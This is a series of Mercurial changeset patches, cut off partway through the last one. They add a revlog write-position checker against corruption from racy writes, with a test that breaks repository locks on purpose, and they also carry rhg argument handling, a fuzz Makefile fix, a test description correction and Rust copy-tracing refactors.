ced66295ea90fc0ba66da3c5d616e975289ae5eb revlog: add a mechanism to verify expected file position before appending If someone uses `hg debuglocks`, or some non-hg process writes to the .hg directory without respecting the locks, or if the repo's on a networked filesystem, it's possible for the revlog code to write out corrupted data. The form of this corruption can vary depending on what data was written and how that happened. We are in the "networked filesystem" case (though I've had users also do this to themselves with the "`hg debuglocks`" scenario), and most often see this with the changelog. What ends up happening is we produce two items (let's call them rev1 and rev2) in the .i file that have the same linkrev, baserev, and offset into the .d file, while the data in the .d file is appended properly. rev2's compressed_size is accurate for rev2, but when we go to decompress the data in the .d file, we use the offset that's recorded in the index file, which is the same as rev1, and attempt to decompress rev2.compressed_size bytes of rev1's data. This usually does not succeed. :) When using inline data, this also fails, though I haven't investigated why too closely. This shows up as a "patch decode" error. I believe what's happening there is that we're basically ignoring the offset field, getting the data properly, but since baserev != rev, it thinks this is a delta based on rev (instead of a full text) and can't actually apply it as such. For now, I'm going to make this an optional component and default it to entirely off. I may increase the default severity of this in the future, once I've enabled it for my users and we gain more experience with it. Luckily, most of my users have a versioned filesystem and can roll back to before the corruption has been written, it's just a hassle to do so and not everyone knows how (so it's a support burden). Users on other filesystems will not have that luxury, and this can cause them to have a corrupted repository that they are unlikely to know how to resolve, and they'll see this as a data-loss event. Refusing to create the corruption is a much better user experience. This mechanism is not perfect. There may be false-negatives (racy writes that are not detected). There should not be any false-positives (non-racy writes that are detected as such). This is not a mechanism that makes putting a repo on a networked filesystem "safe" or "supported", just *less* likely to cause corruption. Differential Revision: https://phab.mercurial-scm.org/D9952 diff --git a/hgext/git/__init__.py b/hgext/git/__init__.py --- a/hgext/git/__init__.py +++ b/hgext/git/__init__.py @@ -90,7 +90,7 @@ return os.path.join(self.path, b'..', b'.hg', f) raise NotImplementedError(b'Need to pick file for %s.' % f) - def changelog(self, trypending): + def changelog(self, trypending, concurrencychecker): # TODO we don't have a plan for trypending in hg's git support yet return gitlog.changelog(self.git, self._db) diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -380,7 +380,7 @@ class changelog(revlog.revlog): - def __init__(self, opener, trypending=False): + def __init__(self, opener, trypending=False, concurrencychecker=None): """Load a changelog revlog using an opener. If ``trypending`` is true, we attempt to load the index from a @@ -389,6 +389,9 @@ revision) data for a transaction that hasn't been finalized yet. It exists in a separate file to facilitate readers (such as hooks processes) accessing data before a transaction is finalized. + + ``concurrencychecker`` will be passed to the revlog init function, see + the documentation there. """ if trypending and opener.exists(b'00changelog.i.a'): indexfile = b'00changelog.i.a' @@ -404,6 +407,7 @@ checkambig=True, mmaplargeindex=True, persistentnodemap=opener.options.get(b'persistent-nodemap', False), + concurrencychecker=concurrencychecker, ) if self._initempty and (self.version & 0xFFFF == revlog.REVLOGV1): diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -580,6 +580,11 @@ default=0, ) coreconfigitem( + b'debug', + b'revlog.verifyposition.changelog', + default=b'', +) +coreconfigitem( b'defaults', b'.*', default=None, diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -84,7 +84,10 @@ stringutil, ) -from .revlogutils import constants as revlogconst +from .revlogutils import ( + concurrency_checker as revlogchecker, + constants as revlogconst, +) release = lockmod.release urlerr = util.urlerr @@ -1639,7 +1642,10 @@ def changelog(self): # load dirstate before changelog to avoid race see issue6303 self.dirstate.prefetch_parents() - return self.store.changelog(txnutil.mayhavepending(self.root)) + return self.store.changelog( + txnutil.mayhavepending(self.root), + concurrencychecker=revlogchecker.get_checker(self.ui, b'changelog'), + ) @storecache(b'00manifest.i') def manifestlog(self): diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -421,6 +421,11 @@ If `upperboundcomp` is not None, this is the expected maximal gain from compression for the data content. + + `concurrencychecker` is an optional function that receives 3 arguments: a + file handle, a filename, and an expected position. It should check whether + the current position in the file handle is valid, and log/warn/fail (by + raising). """ _flagserrorclass = error.RevlogError @@ -435,6 +440,7 @@ censorable=False, upperboundcomp=None, persistentnodemap=False, + concurrencychecker=None, ): """ create a revlog object @@ -490,6 +496,8 @@ self._loadindex() + self._concurrencychecker = concurrencychecker + def _loadindex(self): mmapindexthreshold = None opts = self.opener.options @@ -2284,6 +2292,21 @@ curr = len(self) prev = curr - 1 offset = self.end(prev) + + if self._concurrencychecker: + if self._inline: + # offset is "as if" it were in the .d file, so we need to add on + # the size of the entry metadata. + self._concurrencychecker( + ifh, self.indexfile, offset + curr * self._io.size + ) + else: + # Entries in the .i are a consistent size. + self._concurrencychecker( + ifh, self.indexfile, curr * self._io.size + ) + self._concurrencychecker(dfh, self.datafile, offset) + p1r, p2r = self.rev(p1), self.rev(p2) # full versions are inserted when the needed deltas diff --git a/mercurial/revlogutils/concurrency_checker.py b/mercurial/revlogutils/concurrency_checker.py new file mode 100644 --- /dev/null +++ b/mercurial/revlogutils/concurrency_checker.py @@ -0,0 +1,38 @@ +from ..i18n import _ +from .. import error + + +def get_checker(ui, revlog_name=b'changelog'): + """Get a function that checks file handle position is as expected. + + This is used to ensure that files haven't been modified outside of our + knowledge (such as on a networked filesystem, if `hg debuglocks` was used, + or writes to .hg that ignored locks happened). + + Due to revlogs supporting a concept of buffered, delayed, or diverted + writes, we're allowing the files to be shorter than expected (the data may + not have been written yet), but they can't be longer. + + Please note that this check is not perfect; it can't detect all cases (there + may be false-negatives/false-OKs), but it should never claim there's an + issue when there isn't (false-positives/false-failures). + """ + + vpos = ui.config(b'debug', b'revlog.verifyposition.' + revlog_name) + # Avoid any `fh.tell` cost if this isn't enabled. + if not vpos or vpos not in [b'log', b'warn', b'fail']: + return None + + def _checker(fh, fn, expected): + if fh.tell() <= expected: + return + + msg = _(b'%s: file cursor at position %d, expected %d') + # Always log if we're going to warn or fail. + ui.log(b'debug', msg + b'\n', fn, fh.tell(), expected) + if vpos == b'warn': + ui.warn((msg + b'\n') % (fn, fh.tell(), expected)) + elif vpos == b'fail': + raise error.RevlogError(msg % (fn, fh.tell(), expected)) + + return _checker diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -433,8 +433,12 @@ l.sort() return l - def changelog(self, trypending): - return changelog.changelog(self.vfs, trypending=trypending) + def changelog(self, trypending, concurrencychecker=None): + return changelog.changelog( + self.vfs, + trypending=trypending, + concurrencychecker=concurrencychecker, + ) def manifestlog(self, repo, storenarrowmatch): rootstore = manifest.manifestrevlog(self.vfs) diff --git a/tests/test-racy-mutations.t b/tests/test-racy-mutations.t new file mode 100644 --- /dev/null +++ b/tests/test-racy-mutations.t @@ -0,0 +1,102 @@ +#testcases skip-detection fail-if-detected + +Test situations that "should" only be reproducible: +- on networked filesystems, or +- user using `hg debuglocks` to eliminate the lock file, or +- something (that doesn't respect the lock file) writing to the .hg directory +while we're running + + $ hg init a + $ cd a + + $ cat > "$TESTTMP/waitlock_editor.sh" <<EOF + > [ -n "\${WAITLOCK_ANNOUNCE:-}" ] && touch "\${WAITLOCK_ANNOUNCE}" + > f="\${WAITLOCK_FILE}" + > start=\`date +%s\` + > timeout=5 + > while [ \\( ! -f \$f \\) -a \\( ! -L \$f \\) ]; do + > now=\`date +%s\` + > if [ "\`expr \$now - \$start\`" -gt \$timeout ]; then + > echo "timeout: \$f was not created in \$timeout seconds (it is now \$(date +%s))" + > exit 1 + > fi + > sleep 0.1 + > done + > if [ \$# -gt 1 ]; then + > cat "\$@" + > fi + > EOF + $ chmod +x "$TESTTMP/waitlock_editor.sh" + +Things behave differently if we don't already have a 00changelog.i file when +this all starts, so let's make one. + + $ echo r0 > r0 + $ hg commit -qAm 'r0' + +Start an hg commit that will take a while + $ EDITOR_STARTED="$(pwd)/.editor_started" + $ MISCHIEF_MANAGED="$(pwd)/.mischief_managed" + $ JOBS_FINISHED="$(pwd)/.jobs_finished" + +#if fail-if-detected + $ cat >> .hg/hgrc << EOF + > [debug] + > revlog.verifyposition.changelog = fail + > EOF +#endif + + $ echo foo > foo + $ (WAITLOCK_ANNOUNCE="${EDITOR_STARTED}" \ + > WAITLOCK_FILE="${MISCHIEF_MANAGED}" \ + > HGEDITOR="$TESTTMP/waitlock_editor.sh" \ + > hg commit -qAm 'r1 (foo)' --edit foo > .foo_commit_out 2>&1 ; touch "${JOBS_FINISHED}") & + +Wait for the "editor" to actually start + $ WAITLOCK_FILE="${EDITOR_STARTED}" "$TESTTMP/waitlock_editor.sh" + +Break the locks, and make another commit. + $ hg debuglocks -LW + $ echo bar > bar + $ hg commit -qAm 'r2 (bar)' bar + $ hg debugrevlogindex -c + rev linkrev nodeid p1 p2 + 0 0 222799e2f90b 000000000000 000000000000 + 1 1 6f124f6007a0 222799e2f90b 000000000000 + +Awaken the editor from that first commit + $ touch "${MISCHIEF_MANAGED}" +And wait for it to finish + $ WAITLOCK_FILE="${JOBS_FINISHED}" "$TESTTMP/waitlock_editor.sh" + +#if skip-detection +(Ensure there was no output) + $ cat .foo_commit_out +And observe a corrupted repository -- rev 2's linkrev is 1, which should never +happen for the changelog (the linkrev should always refer to itself). + $ hg debugrevlogindex -c + rev linkrev nodeid p1 p2 + 0 0 222799e2f90b 000000000000 000000000000 + 1 1 6f124f6007a0 222799e2f90b 000000000000 + 2 1 ac80e6205bb2 222799e2f90b 000000000000 +#endif + +#if fail-if-detected + $ cat .foo_commit_out + transaction abort! + rollback completed + note: commit message saved in .hg/last-message.txt + note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it + abort: 00changelog.i: file cursor at position 249, expected 121 +And no corruption in the changelog. + $ hg debugrevlogindex -c + rev linkrev nodeid p1 p2 + 0 0 222799e2f90b 000000000000 000000000000 + 1 1 6f124f6007a0 222799e2f90b 000000000000 +And, because of transactions, there's none in the manifestlog either. + $ hg debugrevlogindex -m + rev linkrev nodeid p1 p2 + 0 0 7b7020262a56 000000000000 000000000000 + 1 1 ad3fe36d86d9 7b7020262a56 000000000000 +#endif + # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614338203 -3600 # Fri Feb 26 12:16:43 2021 +0100 # Node ID 4e4c70401028bb73b9cce8401c88b0fb4cbc40ae # Parent e9901d01d135647cf7bf518aa30a03a4088b067b rhg: Use clap’s support for global CLI arguments By default, clap only accepts app-level arguments (as opposed to sub-command level) to be specified before a sub-command: `rhg -R ./foo log`. Specifying them after would be rejected: `rhg log -R ./foo`. Previously we worked around that by registering global arguments both at the app level and on each sub-command, but that required looking for their value in two places. It turns out that Clap has built-in support for what we want to do, so let’s use it. Also, Clap "settings" turn out to be either global or not too. Let’s make `AllowInvalidUtf8` apply to sub-commands too. Differential Revision: https://phab.mercurial-scm.org/D10080 diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -15,39 +15,38 @@ mod ui; use error::CommandError; -fn add_global_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> { - app.arg( - Arg::with_name("repository") - .help("repository root directory") - .short("-R") - .long("--repository") - .value_name("REPO") - .takes_value(true), - ) - .arg( - Arg::with_name("config") - .help("set/override config option (use 'section.name=value')") - .long("--config") - .value_name("CONFIG") - .takes_value(true) - // Ok: `--config section.key1=val --config section.key2=val2` - .multiple(true) - // Not ok: `--config section.key1=val section.key2=val2` - .number_of_values(1), - ) -} - fn main_with_result( ui: &ui::Ui, process_start_time: &blackbox::ProcessStartTime, ) -> Result<(), CommandError> { env_logger::init(); let app = App::new("rhg") - .setting(AppSettings::AllowInvalidUtf8) + .global_setting(AppSettings::AllowInvalidUtf8) .setting(AppSettings::SubcommandRequired) .setting(AppSettings::VersionlessSubcommands) + .arg( + Arg::with_name("repository") + .help("repository root directory") + .short("-R") + .long("--repository") + .value_name("REPO") + .takes_value(true) + // Both ok: `hg -R ./foo log` or `hg log -R ./foo` + .global(true), + ) + .arg( + Arg::with_name("config") + .help("set/override config option (use 'section.name=value')") + .long("--config") + .value_name("CONFIG") + .takes_value(true) + .global(true) + // Ok: `--config section.key1=val --config section.key2=val2` + .multiple(true) + // Not ok: `--config section.key1=val section.key2=val2` + .number_of_values(1), + ) .version("0.0.1"); - let app = add_global_args(app); let app = add_subcommand_args(app); let matches = app.clone().get_matches_safe()?; @@ -58,26 +57,15 @@ let subcommand_args = subcommand_matches .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired"); - // Global arguments can be in either based on e.g. `hg -R ./foo log` v.s. - // `hg log -R ./foo` - let value_of_global_arg = |name| { - subcommand_args - .value_of_os(name) - .or_else(|| matches.value_of_os(name)) - }; - // For arguments where multiple occurences are allowed, return a - // possibly-iterator of all values. - let values_of_global_arg = |name: &str| { - let a = matches.values_of_os(name).into_iter().flatten(); - let b = subcommand_args.values_of_os(name).into_iter().flatten(); - a.chain(b) - }; - - let config_args = values_of_global_arg("config") + let config_args = matches + .values_of_os("config") + // Turn `Option::None` into an empty iterator: + .into_iter() + .flatten() .map(hg::utils::files::get_bytes_from_os_str); let non_repo_config = &hg::config::Config::load(config_args)?; - let repo_path = value_of_global_arg("repository").map(Path::new); + let repo_path = matches.value_of_os("repository").map(Path::new); let repo = match Repo::find(non_repo_config, repo_path) { Ok(repo) => Ok(repo), Err(RepoError::NotFound { at }) if repo_path.is_none() => { @@ -141,7 +129,7 @@ fn add_subcommand_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> { app $( - .subcommand(add_global_args(commands::$command::args())) + .subcommand(commands::$command::args()) )+ } # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1614188454 18000 # Wed Feb 24 12:40:54 2021 -0500 # Node ID 25b1610f8534f6c588367ded4318cb7d762fe32c # Parent 4e4c70401028bb73b9cce8401c88b0fb4cbc40ae fuzz: if the caller of our makefile sets CC and CXX, trust them This should fix the broken fuzzing build, because we've been explicitly using clang++ but are now being given a CXX=afl++, which does extra stuff. Differential Revision: https://phab.mercurial-scm.org/D10066 diff --git a/contrib/fuzz/Makefile b/contrib/fuzz/Makefile --- a/contrib/fuzz/Makefile +++ b/contrib/fuzz/Makefile @@ -1,5 +1,5 @@ -CC = clang -CXX = clang++ +CC ?= clang +CXX ?= clang++ # By default, use our own standalone_fuzz_target_runner. # This runner does no fuzzing, but simply executes the inputs # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614187653 28800 # Wed Feb 24 09:27:33 2021 -0800 # Node ID d7d64b8c8229e47073634ca8860c060ac5949a5e # Parent 25b1610f8534f6c588367ded4318cb7d762fe32c tests: correct a commit description in test-copies-chain-merge.t Differential Revision: https://phab.mercurial-scm.org/D10065 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -78,7 +78,7 @@ $ echo "original content for P" > p $ echo "original content for Q" > q $ echo "original content for R" > r - $ hg ci -Am 'i-0 initial commit: a b h' + $ hg ci -Am 'i-0 initial commit: a b h p q r' adding a adding b adding h @@ -96,7 +96,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r And having another branch with renames on the other side @@ -114,7 +114,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Have a branching with nothing on one side @@ -131,7 +131,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Create a branch that delete a file previous renamed @@ -148,7 +148,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Create a branch that delete a file previous renamed and recreate it @@ -170,7 +170,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Having another branch renaming a different file to the same filename as another @@ -191,7 +191,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg up -q null @@ -213,7 +213,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg up -q null @@ -235,7 +235,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg up -q null @@ -281,7 +281,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -331,7 +331,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Comparing with a merge re-adding the file afterward @@ -371,7 +371,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -419,7 +419,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: new copy information on both side with an actual merge happening @@ -462,7 +462,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: existing copy information overwritten on one branch @@ -518,7 +518,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: existing copy information overwritten on one branch, with different content) @@ -572,7 +572,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -623,7 +623,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: merging a change to a file with a "copy overwrite" to that file from another branch @@ -678,7 +678,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -736,7 +736,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -785,7 +785,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -834,7 +834,7 @@ | | o | i-1: a -move-> c, p -move-> s |/ - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Variant of previous with extra changes introduced by the merge @@ -888,7 +888,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Decision from previous merge are properly chained with later merge @@ -995,7 +995,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: chaining conflicting rename resolution, with actual merging happening @@ -1094,7 +1094,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: chaining salvage information during a merge @@ -1177,7 +1177,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -1273,7 +1273,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: chaining conflicting rename resolution, with extra change during the merge @@ -1356,7 +1356,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Summary of all created cases @@ -1379,7 +1379,7 @@ f-2: rename i -> d g-1: update d h-1: b -(move)-> d - i-0 initial commit: a b h + i-0 initial commit: a b h p q r i-1: a -move-> c, p -move-> s i-2: c -move-> d, s -move-> t j-1: unrelated changes (based on the "a" series of changes) @@ -1919,7 +1919,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mABm")' @@ -1986,7 +1986,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r - comparing from the merge @@ -2072,7 +2072,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBDm-0")' M d @@ -2163,7 +2163,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #if no-changeset $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' @@ -2294,7 +2294,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBFm-0")' M b @@ -2343,7 +2343,7 @@ | o f-1: rename h -> i : - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2359,7 +2359,7 @@ | o f-1: rename h -> i : - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2392,7 +2392,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBRm-0")' M b @@ -2441,7 +2441,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2457,7 +2457,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2492,7 +2492,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r One side of the merge have a long history with rename. The other side of the merge point to a new file with a smaller history. Each side is "valid". @@ -2535,7 +2535,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2564,7 +2564,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2606,7 +2606,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Note: @@ -2688,7 +2688,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2714,7 +2714,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2750,7 +2750,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #if no-changeset @@ -2879,7 +2879,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r 'a' is the copy source of 'd' @@ -2930,7 +2930,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r 'a' is the the copy source of 'd' @@ -2982,7 +2982,7 @@ | | o | i-1: a -move-> c, p -move-> s |/ - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCH-delete-before-conflict-m")' @@ -3049,7 +3049,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #if no-changeset $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f' # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1610103496 -3600 # Fri Jan 08 11:58:16 2021 +0100 # Node ID 1fce35fcb4db0194edb2bd2ee471692ed9a90612 # Parent d7d64b8c8229e47073634ca8860c060ac5949a5e copies-rust: pass `PathToken` around by value It’s just a `usize`. Differential Revision: https://phab.mercurial-scm.org/D10069 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -617,7 +617,7 @@ ) -> InternalPathCopies { use crate::utils::{ordmap_union_with_merge, MergeResult}; - ordmap_union_with_merge(minor, major, |dest, src_minor, src_major| { + ordmap_union_with_merge(minor, major, |&dest, src_minor, src_major| { let (pick, overwrite) = compare_value( path_map, current_merge, @@ -664,7 +664,7 @@ path_map: &TwoWayPathMap, current_merge: Revision, changes: &ChangedFiles, - dest: &PathToken, + dest: PathToken, src_minor: &CopySource, src_major: &CopySource, ) -> (MergePick, bool) { @@ -693,7 +693,7 @@ } } else { debug_assert!(src_major.rev != src_major.rev); - let dest_path = path_map.untokenize(*dest); + let dest_path = path_map.untokenize(dest); let action = changes.get_merge_case(dest_path); if src_minor.path.is_some() && src_major.path.is_none() # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1610363836 -3600 # Mon Jan 11 12:17:16 2021 +0100 # Node ID 80f7567ac9bb142ed752439eeb6dd41736e10f10 # Parent 1fce35fcb4db0194edb2bd2ee471692ed9a90612 copies-rust: pass closures and iterators instead of `&ChangedFiles` … to some functions that only use one method. This will makes it easier to unit-test them. Differential Revision: https://phab.mercurial-scm.org/D10070 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -387,6 +387,21 @@ p2: Revision, changes: ChangedFiles<'_>, ) { + self.add_revision_inner(rev, p1, p2, changes.iter_actions(), |path| { + changes.get_merge_case(path) + }) + } + + /// Separated out from `add_revsion` so that unit tests can call this + /// without synthetizing a `ChangedFiles` in binary format. + fn add_revision_inner<'a>( + &mut self, + rev: Revision, + p1: Revision, + p2: Revision, + copy_actions: impl Iterator<Item = Action<'a>>, + get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, + ) { // Retrieve data computed in a previous iteration let p1_copies = match p1 { NULL_REVISION => None, @@ -409,7 +424,7 @@ &mut self.path_map, p1_copies, p2_copies, - &changes, + copy_actions, rev, ); let copies = match (p1_copies, p2_copies) { @@ -421,7 +436,7 @@ rev, p2_copies, p1_copies, - &changes, + get_merge_case, )), }; if let Some(c) = copies { @@ -476,11 +491,11 @@ /// Combine ChangedFiles with some existing PathCopies information and return /// the result -fn chain_changes( +fn chain_changes<'a>( path_map: &mut TwoWayPathMap, base_p1_copies: Option<InternalPathCopies>, base_p2_copies: Option<InternalPathCopies>, - changes: &ChangedFiles, + copy_actions: impl Iterator<Item = Action<'a>>, current_rev: Revision, ) -> (Option<InternalPathCopies>, Option<InternalPathCopies>) { // Fast path the "nothing to do" case. @@ -490,7 +505,7 @@ let mut p1_copies = base_p1_copies.clone(); let mut p2_copies = base_p2_copies.clone(); - for action in changes.iter_actions() { + for action in copy_actions { match action { Action::CopiedFromP1(path_dest, path_source) => { match &mut p1_copies { @@ -613,16 +628,14 @@ current_merge: Revision, minor: InternalPathCopies, major: InternalPathCopies, - changes: &ChangedFiles, + get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, ) -> InternalPathCopies { use crate::utils::{ordmap_union_with_merge, MergeResult}; ordmap_union_with_merge(minor, major, |&dest, src_minor, src_major| { let (pick, overwrite) = compare_value( - path_map, current_merge, - changes, - dest, + || get_merge_case(path_map.untokenize(dest)), src_minor, src_major, ); @@ -649,6 +662,7 @@ /// represent the side that should prevail when merging two /// InternalPathCopies +#[derive(Debug, PartialEq)] enum MergePick { /// The "major" (p1) side prevails Major, @@ -661,10 +675,8 @@ /// decide which side prevails in case of conflicting values #[allow(clippy::if_same_then_else)] fn compare_value( - path_map: &TwoWayPathMap, current_merge: Revision, - changes: &ChangedFiles, - dest: PathToken, + merge_case_for_dest: impl Fn() -> MergeCase, src_minor: &CopySource, src_major: &CopySource, ) -> (MergePick, bool) { @@ -693,8 +705,7 @@ } } else { debug_assert!(src_major.rev != src_major.rev); - let dest_path = path_map.untokenize(dest); - let action = changes.get_merge_case(dest_path); + let action = merge_case_for_dest(); if src_minor.path.is_some() && src_major.path.is_none() && action == MergeCase::Salvaged # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614291275 -3600 # Thu Feb 25 23:14:35 2021 +0100 # Node ID f64b6953db7048c28fa66a7532c1f092c20e3204 # Parent 80f7567ac9bb142ed752439eeb6dd41736e10f10 rhg: Bug fix: with share-safe, always read store requirements That is, the `store/requires` file, regardless of whether the repository is a shared. Differential Revision: https://phab.mercurial-scm.org/D10078 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -116,9 +116,6 @@ let store_path; if !shared { store_path = dot_hg.join("store"); - if share_safe { - reqs.extend(requirements::load(Vfs { base: &store_path })?); - } } else { let bytes = hg_vfs.read("sharedpath")?; let mut shared_path = get_path_from_bytes(&bytes).to_owned(); @@ -166,6 +163,9 @@ repo_config_files.insert(0, shared_path.join("hgrc")) } } + if share_safe { + reqs.extend(requirements::load(Vfs { base: &store_path })?); + } let repo_config = config.combine_with_repo(&repo_config_files)?; # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614284704 -3600 # Thu Feb 25 21:25:04 2021 +0100 # Node ID a069639783a0d3038805e01badf0479502f08c40 # Parent f64b6953db7048c28fa66a7532c1f092c20e3204 rhg: Check .hg/requires for absence of required features Some old repository layouts are not supported. Differential Revision: https://phab.mercurial-scm.org/D10076 diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -1,5 